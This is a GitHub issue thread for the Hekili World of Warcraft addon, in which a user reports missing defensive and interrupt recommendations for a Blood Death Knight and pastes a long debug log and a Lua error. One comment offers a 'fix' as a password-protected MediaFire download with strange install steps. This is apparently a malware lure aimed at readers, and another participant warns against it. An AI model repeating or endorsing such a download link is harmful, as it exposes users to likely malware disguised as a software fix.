### ISSUE TITLE
Defensives and interrupts not showing

### ISSUE THREAD

**Issue by BiffBlackstar** [Hekili/hekili#3557]
### Before You Begin

- [X] I confirm that I have downloaded the latest version of the addon.
- [X] I am not playing on a private server.
- [X] I checked for an [existing, open ticket](https://github.com/Hekili/hekili/issues?q=is%3Aissue+is%3Aopen+sort%3Aupdated-desc) for this issue and was not able to find one.
- [X] I edited the title of this bug report (above) so that it describes the issue I am reporting.

### Describe the Issue

Playing as a Blood DK i cant see my defensives or interrupts. Primary and Cooldowns are working as intended. 

### How to Reproduce

Play the game as a Blood DK. 

### Player Information (Link)

Blood; Defensives - N/A build: v11.0.2-1.0.4 level: 80 (80) class: DEATHKNIGHT spec: blood  talents: CoPAtbMOTHlnKIwUyAn+DK70SjhxMzYMzMmZYGzMz0MMMzYGDAAAAAmZmZmZmZmNzMjBAAAzMzMAAAAbmtBGwSw2wEYYBgZwG     abomination_limb = 1/1     antimagic_barrier = 1/1     antimagic_zone = 1/1     bind_in_darkness = 1/1     blinding_sleet = 1/1     blood_boil = 1/1     blood_draw = 1/1     blood_fever = 1/1     bloodshot = 1/1     bone_collector = 1/1     bonestorm = 1/1     brittle = 1/1     cleaving_strikes = 1/1     coagulopathy = 1/1     consumption = 1/1     dancing_rune_weapon = 1/1     death_strike = 1/1     deathbringer = 1/1     deaths_echo = 1/1     deaths_messenger = 1/1     everlasting_bond = 1/1     exterminate = 1/1     gloom_ward = 1/1     grim_reaper = 1/1     grip_of_the_dead = 1/1     heart_strike = 1/1     heartbreaker = 1/1     heartrend = 1/1     hemostasis = 1/1     icebound_fortitude = 1/1     icy_talons = 1/1     improved_bone_shield = 1/1     improved_death_strike = 1/1     improved_heart_strike = 2/2     insatiable_blade = 1/1     insidious_chill = 1/1     iron_heart = 1/1     marrowrend = 1/1     mind_freeze = 1/1     null_magic = 1/1     ossified_vitriol = 1/1     ossuary = 1/1     painful_death = 1/1     permafrost = 1/1     perseverance_of_the_ebon_blade = 1/1     purgatory = 1/1     raise_dead = 1/1     rapid_decomposition = 1/1     reapers_mark = 1/1     red_thirst = 1/1     reinforced_bones = 1/1     rune_carved_plates = 1/1     rune_mastery = 2/2     runic_attenuation = 1/1     sanguine_ground = 1/1     shattering_bone = 1/1     soul_reaper = 1/1     soul_rupture = 1/1     subduing_grasp = 1/1     suppression = 1/1     tombstone = 1/1     unholy_bond = 1/1     unholy_endurance = 1/1     unholy_ground = 1/1     vampiric_blood = 1/1     vestigial_shell = 1/1     veteran_of_the_third_war = 1/1     voracious = 1/1     wave_of_souls = 1/1     will_of_the_necropolis = 2/2     wither_away = 1/1  pvptalents: none  covenant: none  conduits: none  soulbinds: [plague_deviser_marileth]  sets: none  gear: bestial_underground_cleaver = 1     chiseled_boulder_pauldrons = 1     clattering_chitin_necklace = 1     footguards_of_the_nerubian_twins = 1     grips_of_the_earth = 1     hissing_blackblood_ring = 1     honorable_arathi_breastplate = 1     liberators_tarnished_band = 1     makruras_foreboding_legplates = 1     quickwick_candlestick = 1     shadowed_essence = 1     smuggled_nerubian_cuffs = 1     stalwart_girdle = 1     vilewing_visor = 1     webspeakers_spiritual_cloak = 1  legendaries: none  itemIDs: 221210, 221251, 223290, 223369, 223375, 223378, 223405, 223462, 223934, 224622, 225537, 225545, 225649, 225693, 228443  settings: aoe = 3     combatRefresh = 0.25     custom1Name = Custom 1     custom2Name = Custom 2     cycle = false     cycle_min = 6     damage = true     damageDots = false     damageExpiration = 8     damageOnScreen = true     damagePets = false     damageRange = 0     enabled = true     gcdSync = true     maxTime = 20     nameplateRange = 10     nameplates = true     noFeignedCooldown = false     package = Blood     petbased = false     potion = potion_of_phantom_fire     rangeFilter = false     regularRefresh = 0.5     throttleRefresh = false     throttleTime = false     death_strike_pool_amount = 65     ibf_damage = 40     rt_damage = 30     save_blood_shield = true     vb_damage = 50  toggles: cooldowns = true [separate]     custom1 = false      custom2 = false      defensives = true [separate]     essences = true [overridden]     funnel = false      interrupts = true [separate]     mode = automatic      potions = false   keybinds:      abomination_limb    = 4   [01]     ancestral_call      = S4  [05]     antimagic_shell     = S1  [05], SM4 [11]     antimagic_zone      = SM4 [01]     blinding_sleet      = SQ  [06]     blood_boil          = M5  [01]     bonestorm           = M3  [05]     consumption         = SE  [06]     dancing_rune_weapon = S2  [05]     dark_command        = SR  [05]     death_and_decay     = M4  [01], M4  [11]     death_grip          = R   [05]     death_strike        = F   [06]     deaths_advance      = SF  [06]     deaths_caress       = 1   [01]     heart_strike        = 2   [01]     icebound_fortitude  = SG  [03]     lichborne           = G   [03]     marrowrend          = E   [06]     mind_freeze         = Q   [06]     raise_dead          = S3  [05]     reapers_mark        = 3   [01]     soul_reaper         = SM5 [01]     tombstone           = SM3 [05]     vampiric_blood      = AM3 [05]     vampiric_strike     = 2   [01]  warnings: none   targets:  Nameplates are enabled.  - Checking nameplate list for nameplate1 [ Creature-0-4254-2552-5164-225983-0000CC8AEA ] Dungeoneer's Training Dummy.     - Excluded by range (15 > 10).  - Checking nameplate list for nameplate4 [ Creature-0-4254-2552-5164-225984-0000CC8AEB ] Training Dummy.     nameplate4   -  7 - Creature-0-4254-2552-5164-225984-0000CC8AEB - 300.00 - -1 - Training Dummy    player_buffs:    404464 - flight_style_skyriding                   -   1 - 3600.00    447954 - *exterminate                             -   1 - 3600.00    441416 - exterminate                              -   1 - 3600.00  player_debuffs:  target_auras:  target does not exist   New Recommendations for [ Defensives ] requested at 22:07:53 ( 43840.14 ); using built-in ( Blood ) priority. *** START OF NEW DISPLAY: Defensives *** Purged 254 marked values in 0.19ms.  RECOMMENDATION #1 ( Offset: 0.00, GCD: 0.00, Casting: 0.00 ).      Resources: runes[ 6.00 / 6.00 ], runic_power[ 0.00 / 125.00 ]     Checking if I'm casting ( No ) and if it is a channel ( No ).     No whitelist.          Processing precombat action list [ Blood - precombat ].                  Current recommendation was NO ACTION at +10.00s.                  1.   variable ( precombat - 1 )          - variable.trinket_1_buffs[false] will check this script entry ( Blood:precombat:1 )         Time spent on this action:  0.03ms         TimeData:Blood-precombat-1:variable:0.03:Ability Known, Enabled(0.02):Post-TTR and Essential(0.02)                  2.   variable ( precombat - 2 )          - variable.trinket_2_buffs[false] will check this script entry ( Blood:precombat:2 )         Time spent on this action:  0.02ms         TimeData:Blood-precombat-2:variable:0.02:Ability Known, Enabled(0.01):Post-TTR and Essential(0.01)                  3.   variable ( precombat - 3 )          - variable.trinket_1_exclude[false] will check this script entry ( Blood:precombat:3 )         Time spent on this action:  0.02ms         TimeData:Blood-precombat-3:variable:0.02:Ability Known, Enabled(0.01):Post-TTR and Essential(0.01)                  4.   variable ( precombat - 4 )          - variable.trinket_2_exclude[false] will check this script entry ( Blood:precombat:4 )         Time spent on this action:  0.03ms         TimeData:Blood-precombat-4:variable:0.03:Ability Known, Enabled(0.01):Post-TTR and Essential(0.02)                  5.   variable ( precombat - 5 )          - variable.damage_trinket_priority[1] will check this script entry ( Blood:precombat:5 )         Time spent on this action:  0.02ms         TimeData:Blood-precombat-5:variable:0.02:Ability Known, Enabled(0.01):Post-TTR and Essential(0.01)         Exiting precombat with recommendation of NO ACTION at +10.00s.          Completed precombat action list [ Blood - precombat ].          Processing default action list [ Blood - default ].                  Current recommendation was NO ACTION at +10.00s.                  6.   variable ( default - 1 )          - variable.death_strike_dump_amount[65] will check this script entry ( Blood:default:1 )         Time spent on this action:  0.02ms         TimeData:Blood-default-1:variable:0.02:Ability Known, Enabled(0.01):Post-TTR and Essential(0.01)                  7.   variable ( default - 2 )          - variable.bone_shield_refresh_value[4] will check this script entry ( Blood:default:2 )         Time spent on this action:  0.02ms         TimeData:Blood-default-2:variable:0.02:Ability Known, Enabled(0.01):Post-TTR and Essential(0.01)                  8.   mind_freeze ( default - 3 ) - ability disabled ( toggle interrupts )         Time spent on this action:  0.03ms         TimeData:Blood-default-3:mind_freeze:0.03:Ability Known, Enabled(0.03)                  9.   potion ( default - 4 ) - ability disabled ( toggle potions )         Time spent on this action:  0.37ms         TimeData:Blood-default-4:potion:0.37:Ability Known, Enabled(0.37)                  10.  call_action_list:trinkets ( default - 5 )         There is no criteria for trinkets.         Action list (trinkets) was found.         + trinkets         Current recommendation was NO ACTION at +10.00s.                  11.  fyralath_the_dreamrender ( trinkets - 1 ) - IsUsableItem item 206448 and nil         Time spent on this action:  0.03ms         TimeData:Blood-trinkets-1:fyralath_the_dreamrender:0.03:Ability Known, Enabled(0.03)                  Bypassing 'trinket1' action because the equipped trinket #1 is not usable.                  12.  trinket1 ( trinkets - 2 )         Time spent on this action:  0.02ms         TimeData:Blood-trinkets-2:trinket1:0.02:Ability Known, Enabled(0.02)                  Bypassing 'trinket2' action because the equipped trinket #2 is not usable.                  13.  trinket2 ( trinkets - 3 )         Time spent on this action:  0.03ms         TimeData:Blood-trinkets-3:trinket2:0.03:Ability Known, Enabled(0.03)                  14.  main_hand ( trinkets - 4 )         The action (main_hand) is unusable at (0.00 + 0.00) because ability.usable was false.         Time spent on this action:  0.03ms         TimeData:Blood-trinkets-4:main_hand:0.03:Ability Known, Enabled(0.01):Post-TTR and Essential(0.01):Post Cycle(0.00):Post Usable(0.00)                  Bypassing 'trinket1' action because the equipped trinket #1 is not usable.                  15.  trinket1 ( trinkets - 5 )         Time spent on this action:  0.02ms         TimeData:Blood-trinkets-5:trinket1:0.02:Ability Known, Enabled(0.02)                  Bypassing 'trinket2' action because the equipped trinket #2 is not usable.                  16.  trinket2 ( trinkets - 6 )         Time spent on this action:  0.02ms         TimeData:Blood-trinkets-6:trinket2:0.02:Ability Known, Enabled(0.02)         Exiting trinkets with recommendation of NO ACTION at +10.00s.         Returned from list (trinkets), current recommendation is NO ACTION (+10.00).         - trinkets                  17.  raise_dead ( default - 6 ) - ability disabled ( toggle cooldowns )         Time spent on this action:  0.02ms         TimeData:Blood-default-6:raise_dead:0.02:Ability Known, Enabled(0.02)                  18.  reapers_mark ( default - 7 ) - ability disabled ( display )         Time spent on this action:  0.02ms         TimeData:Blood-default-7:reapers_mark:0.02:Ability Known, Enabled(0.02)                  19.  icebound_fortitude ( default - 8 )         The action (icebound_fortitude) is usable at (0.00 + 0.00).          - the action is ready before the current recommendation (at +0.00 vs. +10.00).          - this entry's criteria FAILS: tanking[false] & incoming_damage_5s[0.00] >= ibf_damage[2260696.00] & ! ( buff.dancing_rune_weapon.up[false] | buff.vampiric_blood.up[false] )         There were no recheck events to check.         Time spent on this action:  0.14ms         TimeData:Blood-default-8:icebound_fortitude:0.14:Ability Known, Enabled(0.02):Post-TTR and Essential(0.02):Post Cycle(0.00):Post Usable(0.00):Post Ready/Clash(0.02):Post Stack(0.00):Pre-Script(0.00):Post-Script(0.01):Pre-Recheck(0.05):Post-Recheck Times(0.01):Post Recheck(0.00)                  20.  rune_tap ( default - 9 ) - talent [ rune_tap ] missing         Time spent on this action:  0.02ms         TimeData:Blood-default-9:rune_tap:0.02:Ability Known, Enabled(0.02)                  21.  death_strike ( default - 10 ) - ability disabled ( display )         Time spent on this action:  0.02ms         TimeData:Blood-default-10:death_strike:0.02:Ability Known, Enabled(0.02)                  22.  deaths_caress ( default - 11 ) - ability disabled ( display )         Time spent on this action:  0.02ms         TimeData:Blood-default-11:deaths_caress:0.02:Ability Known, Enabled(0.02)                  23.  death_and_decay ( default - 12 ) - ability disabled ( display )         Time spent on this action:  0.02ms         TimeData:Blood-default-12:death_and_decay:0.02:Ability Known, Enabled(0.02)                  24.  death_strike ( default - 13 ) - ability disabled ( display )         Time spent on this action:  0.02ms         TimeData:Blood-default-13:death_strike:0.02:Ability Known, Enabled(0.02)                  25.  blooddrinker ( default - 14 ) - talent [ blooddrinker ] missing         Time spent on this action:  0.02ms         TimeData:Blood-default-14:blooddrinker:0.02:Ability Known, Enabled(0.02)                  26.  call_action_list:racials ( default - 15 )         There is no criteria for racials.         Action list (racials) was found.         + racials         Current recommendation was NO ACTION at +10.00s.                  27.  blood_fury ( racials - 1 ) - ability unknown         Time spent on this action:  0.02ms         TimeData:Blood-racials-1:blood_fury:0.02:Ability Known, Enabled(0.02)                  28.  berserking ( racials - 2 ) - ability unknown         Time spent on this action:  0.02ms         TimeData:Blood-racials-2:berserking:0.02:Ability Known, Enabled(0.02)                  29.  arcane_pulse ( racials - 3 ) - ability unknown         Time spent on this action:  0.02ms         TimeData:Blood-racials-3:arcane_pulse:0.02:Ability Known, Enabled(0.02)                  30.  lights_judgment ( racials - 4 ) - ability unknown         Time spent on this action:  0.02ms         TimeData:Blood-racials-4:lights_judgment:0.02:Ability Known, Enabled(0.02)                  31.  ancestral_call ( racials - 5 ) - ability disabled ( toggle cooldowns )         Time spent on this action:  0.02ms         TimeData:Blood-racials-5:ancestral_call:0.02:Ability Known, Enabled(0.02)                  32.  fireblood ( racials - 6 ) - ability unknown         Time spent on this action:  0.02ms         TimeData:Blood-racials-6:fireblood:0.02:Ability Known, Enabled(0.02)                  33.  bag_of_tricks ( racials - 7 ) - ability unknown         Time spent on this action:  0.02ms         TimeData:Blood-racials-7:bag_of_tricks:0.02:Ability Known, Enabled(0.02)                  34.  arcane_torrent ( racials - 8 ) - ability unknown         Time spent on this action:  0.02ms         TimeData:Blood-racials-8:arcane_torrent:0.02:Ability Known, Enabled(0.02)         Exiting racials with recommendation of NO ACTION at +10.00s.         Returned from list (racials), current recommendation is NO ACTION (+10.00).         - racials                  35.  sacrificial_pact ( default - 16 ) - talent [ sacrificial_pact ] missing         Time spent on this action:  0.02ms         TimeData:Blood-default-16:sacrificial_pact:0.02:Ability Known, Enabled(0.02)                  36.  blood_tap ( default - 17 ) - talent [ blood_tap ] missing         Time spent on this action:  0.02ms         TimeData:Blood-default-17:blood_tap:0.02:Ability Known, Enabled(0.02)                  37.  gorefiends_grasp ( default - 18 ) - talent [ gorefiends_grasp ] missing         Time spent on this action:  0.02ms         TimeData:Blood-default-18:gorefiends_grasp:0.02:Ability Known, Enabled(0.02)                  38.  empower_rune_weapon ( default - 19 ) - talent [ empower_rune_weapon ] missing         Time spent on this action:  0.02ms         TimeData:Blood-default-19:empower_rune_weapon:0.02:Ability Known, Enabled(0.02)                  39.  abomination_limb ( default - 20 ) - ability disabled ( toggle cooldowns )         Time spent on this action:  0.03ms         TimeData:Blood-default-20:abomination_limb:0.03:Ability Known, Enabled(0.03)                  40.  dancing_rune_weapon ( default - 21 ) - ability disabled ( toggle cooldowns )         Time spent on this action:  0.02ms         TimeData:Blood-default-21:dancing_rune_weapon:0.02:Ability Known, Enabled(0.02)                  41.  run_action_list:drw_up ( default - 22 )         Criteria for drw_up FAIL at +0.00 - buff.dancing_rune_weapon.up[false]                  42.  call_action_list:standard ( default - 23 )         There is no criteria for standard.         Action list (standard) was found.         + standard         Current recommendation was NO ACTION at +10.00s.                  43.  tombstone ( standard - 1 ) - ability disabled ( display )         Time spent on this action:  0.02ms         TimeData:Blood-standard-1:tombstone:0.02:Ability Known, Enabled(0.02)                  44.  variable ( standard - 2 )          - variable.heart_strike_rp[12] will check this script entry ( Blood:standard:2 )         Time spent on this action:  0.02ms         TimeData:Blood-standard-2:variable:0.02:Ability Known, Enabled(0.01):Post-TTR and Essential(0.01)                  45.  death_strike ( standard - 3 ) - ability disabled ( display )         Time spent on this action:  0.03ms         TimeData:Blood-standard-3:death_strike:0.03:Ability Known, Enabled(0.03)                  46.  deaths_caress ( standard - 4 ) - ability disabled ( display )         Time spent on this action:  0.02ms         TimeData:Blood-standard-4:deaths_caress:0.02:Ability Known, Enabled(0.02)                  47.  marrowrend ( standard - 5 ) - ability disabled ( display )         Time spent on this action:  0.02ms         TimeData:Blood-standard-5:marrowrend:0.02:Ability Known, Enabled(0.02)                  48.  consumption ( standard - 6 ) - ability disabled ( display )         Time spent on this action:  0.02ms         TimeData:Blood-standard-6:consumption:0.02:Ability Known, Enabled(0.02)                  49.  soul_reaper ( standard - 7 ) - ability disabled ( display )         Time spent on this action:  0.02ms         TimeData:Blood-standard-7:soul_reaper:0.02:Ability Known, Enabled(0.02)                  50.  soul_reaper ( standard - 8 ) - ability disabled ( display )         Time spent on this action:  0.01ms         TimeData:Blood-standard-8:soul_reaper:0.01:Ability Known, Enabled(0.01)                  51.  bonestorm ( standard - 9 ) - ability disabled ( display )         Time spent on this action:  0.02ms         TimeData:Blood-standard-9:bonestorm:0.02:Ability Known, Enabled(0.02)                  52.  blood_boil ( standard - 10 ) - ability disabled ( display )         Time spent on this action:  0.02ms         TimeData:Blood-standard-10:blood_boil:0.02:Ability Known, Enabled(0.02)                  53.  heart_strike ( standard - 11 ) - ability disabled ( display )         Time spent on this action:  0.02ms         TimeData:Blood-standard-11:heart_strike:0.02:Ability Known, Enabled(0.02)                  54.  blood_boil ( standard - 12 ) - ability disabled ( display )         Time spent on this action:  0.01ms         TimeData:Blood-standard-12:blood_boil:0.01:Ability Known, Enabled(0.01)                  55.  heart_strike ( standard - 13 ) - ability disabled ( display )         Time spent on this action:  0.02ms         TimeData:Blood-standard-13:heart_strike:0.02:Ability Known, Enabled(0.02)         Exiting standard with recommendation of NO ACTION at +10.00s.         Returned from list (standard), current recommendation is NO ACTION (+10.00).         - standard         Exiting default with recommendation of NO ACTION at +10.00s.          Completed default action list [ Blood - default ].     Recommendation is NO ACTION at 0.00 + 10.00.     Recommendation #1 is NO ACTION at 10.00s (10.00s).     Resources: Resources: runes[ 6.00 / 6.00 | 6.00 @ [1 - actual] 0.00 ], runic_power[ 0.00 / 125.00 | 0.00 @ [1 - actual] 0.00 ]     Time spent generating recommendations:  2.50ms

### Error Messages (Link)

74x Hekili/UI.lua:1087: attempt to index field 'Recommendation' (a nil value) [string "@Hekili/UI.lua"]:1087: in function <Hekili/UI.lua:1039>

**Comment by BiffBlackstar** [comment]
Interrupts are now working as intended. Defensives still not working at all.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Zanetsuken** [comment]
DO NOT download the above under any circumstances

**Comment by BiffBlackstar** [comment]
Everything is working as intended. Im just slow in the brain. ;)
